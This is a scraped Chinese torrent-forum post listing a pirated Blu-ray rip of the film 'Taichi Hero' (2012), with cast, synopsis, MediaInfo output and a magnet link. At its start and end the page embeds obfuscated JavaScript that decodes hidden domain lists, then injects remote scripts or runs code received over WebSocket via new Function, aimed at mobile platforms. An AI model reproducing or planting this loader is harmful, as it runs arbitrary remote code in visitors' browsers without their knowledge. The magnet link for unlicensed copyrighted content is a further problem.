太极2:英雄崛起[国语配音/中文字幕].Taichi.Hero.2012.1080p.BluRay.x265.10bit.DTS.5.1 7.12GB

版主小s 13天前 124

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x6a\x79\x50\x6e\x4a\x66\x6d\x45\x43']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译 名 太极2:英雄崛起 / 太极2 / 太极之英雄崛起 / Taichi Hero / Taichi 2

◎年 代 2012

◎产 地 中国大陆

◎类 别 喜剧 / 动作 / 奇幻 / 武侠 / 古装

◎语 言 汉语普通话

◎上映日期 2012-10-25(中国大陆) / 2012-11-01(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt2296404/

◎豆瓣评分 5.9/10 (60582人评价)

◎豆瓣链接 https://movie.douban.com/subject/10573695/

◎片 长 103分钟

◎导 演 冯德伦 Stephen Fung (id:1023278)

◎编 剧 张家鲁 Chia-lu Chang (id:1274308)

程孝泽 Hsiao-tse Cheng (id:1312781)

陈国富 Kuo-fu Chen (id:1075862)

◎演 员 梁家辉 Tony Leung (id:1118167)

袁晓超 Xiaochao Yuan (id:1323426)

杨颖 Angelababy (id:1033011)

彭于晏 Eddie Peng (id:1013782)

冯绍峰 Shaofeng Feng (id:1275721)

谢欣颖 Nikki Hsin-Ying Hsieh (id:1275639)

冯淬帆 Stanley Fung (id:1274503)

吴迪 Di Wu (id:1321268)

熊乃瑾 Naijin Xiong (id:1314041)

申思 Si Shen (id:1324044)

英达 Da Ying (id:1011479)

刘碧丽 Mandy Lieu (id:1314223)

冯德伦 Stephen Fung (id:1023278)

陈思诚 Sicheng Chen (id:1274763)

彼得·斯特曼 Peter Stormare (id:1049549)

袁文康 Wenkang Yuan (id:1274820)

谢贤 Yin Tse (id:1025536)

元彪 Biao Yuen (id:1163752)

吴彦祖 Daniel Wu (id:1027502)

刘洵 Shun Lau (id:1274304)

熊欣欣 Xinxin Xiong (id:1033090)

吴品儒 Ng Ban-Yu (id:1358616)

杨庭恺 Bernard Yang (id:1443208)

陈国富 Kuo-fu Chen (id:1075862)

黎耀辉 Yiu-Fai Lai (id:1289265)

叶锦添 Timmy Yip (id:1301493)

星汉 (id:1391218)

李菲 Fei Li (id:1400568)

吴品儒 Ng Ban-Yu (id:1358616)

赵楠 Nan Zhao (id:1325307)

林克明 Ke Ming Lin (id:1360416)

申思 Si Shen (id:1324044)

洪金宝 Sammo Hung Kam-Bo (id:1055887)

◎标 签 动作 / 武侠 / 喜剧 / 2012 / 香港 / 中国 / 梁家辉 / 搞笑

◎简 介

在帮助陈家沟成功阻击特洛伊后,痴痴傻傻地杨露禅(袁晓超 饰)和陈玉娘(杨颖 饰)喜结连理。可就在大喜的日子里,陈家大哥栽秧(冯绍峰 饰)携妻子允儿(谢欣颖 饰)回到家中。家人团聚,自是一番旧情重叙,独掌门人陈长兴(梁家辉 饰)对长子的到来心存顾虑,反对天资聪慧的露禅寄予厚望。在此之后,接二连三的不安定悄悄在陈家沟滋生。栽秧向族人说起了铜钟夜响和拳法不传外姓人的渊源,致令全村人视露禅有如洪水猛兽,势将其赶出陈家沟。在栽秧种种险恶用心之后,怀着一颗复仇之心的方子敬(彭于晏 饰)的身影时隐时现。

在东西方文明剧烈碰撞的世纪之交,露禅和陈家沟的人们面临着前所未有的生死考验……

◎获奖情况 (共4项)

第3届豆瓣电影鑫像奖 (2013)

豆渣单元 最渣影片(华语)(提名)

豆渣单元 最渣导演(华语)(提名)

└──冯德伦 (id:1023278)

豆渣单元 最渣男演员(华语)(提名)

└──袁晓超 (id:1323426)

豆渣单元 最渣女演员(华语)(提名)

└──杨颖 (id:1033011)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 13331304527294431595140075434099064540 (0xA07840F509A5BE5E72F7FBFD607BEDC)

  4. Complete name : [email protected]M.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.12 GiB

  8. Duration : 1 h 42 min

  9. Overall bit rate : 9 933 kb/s

  10. Movie name : Taichi Hero 2012

  11. Encoded date : UTC 2021-10-11 14:41:56

  12. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@Main

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 42 min

  21. Bit rate : 8 394 kb/s

  22. Width : 1 920 pixels

  23. Height : 816 pixels

  24. Display aspect ratio : 2.35:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.223

  31. Stream size : 6.02 GiB (85%)

  32. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings : rc=crf / crf=17.5000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541049583 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Language : Chinese

  35. Default : Yes

  36. Forced : No


  37. Audio

  38. ID : 2

  39. Format : DTS

  40. Format/Info : Digital Theater Systems

  41. Codec ID : A_DTS

  42. Duration : 1 h 42 min

  43. Bit rate mode : Constant

  44. Bit rate : 1 510 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 24 bits

  50. Compression mode : Lossy

  51. Stream size : 1.08 GiB (15%)

  52. Title : Mandarin

  53. Language : Chinese

  54. Default : Yes

  55. Forced : No


  56. Text #1

  57. ID : 3

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 35 min

  63. Bit rate : 21.0 kb/s

  64. Count of elements : 2374

  65. Stream size : 14.3 MiB (0%)

  66. Title : cht

  67. Default : Yes

  68. Forced : No


  69. Text #2

  70. ID : 4

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 35 min

  76. Bit rate : 20.9 kb/s

  77. Count of elements : 2374

  78. Stream size : 14.3 MiB (0%)

  79. Title : chs

  80. Default : Yes

  81. Forced : No


  82. Text #3

  83. ID : 5

  84. Format : PGS

  85. Muxing mode : zlib

  86. Codec ID : S_HDMV/PGS

  87. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  88. Duration : 1 h 35 min

  89. Bit rate : 28.8 kb/s

  90. Count of elements : 2442

  91. Stream size : 19.8 MiB (0%)

  92. Title : en

  93. Default : Yes

  94. Forced : No


  95. Menu #1

  96. 00:00:00.000 : :第 01 章

  97. 00:09:28.651 : :第 02 章

  98. 00:17:01.854 : :第 03 章

  99. 00:25:25.649 : :第 04 章

  100. 00:33:32.594 : :第 05 章

  101. 00:41:11.594 : :第 06 章

  102. 00:51:42.975 : :第 07 章

  103. 00:59:38.116 : :第 08 章

  104. 01:05:58.079 : :第 09 章

  105. 01:13:33.242 : :第 10 章

  106. 01:21:55.327 : :第 11 章

  107. 01:31:43.790 : :第 12 章


  108. Menu #2

  109. 00:00:00.000 : 第 01 章

  110. 00:07:54.307 : 第 02 章

  111. 00:16:04.046 : 第 03 章

  112. 00:25:40.997 : 第 04 章

  113. 00:33:33.261 : 第 05 章

  114. 00:43:38.949 : 第 06 章

  115. 00:51:13.862 : 第 07 章

  116. 00:59:28.606 : 第 08 章

  117. 01:09:41.677 : 第 09 章

  118. 01:16:03.350 : 第 10 章

  119. 01:24:16.926 : 第 11 章

  120. 01:34:30.456 : 第 12 章




复制代码


TAGS 武侠 动作 奇幻 喜剧 古装

磁力链:
  • magnet:?xt=urn:btih:0C98203FF351B81B1DA65F4C96FBB70A2D19582E

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x54\x47\x50\x48\x42\x70\x79\x79\x5a\x53']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};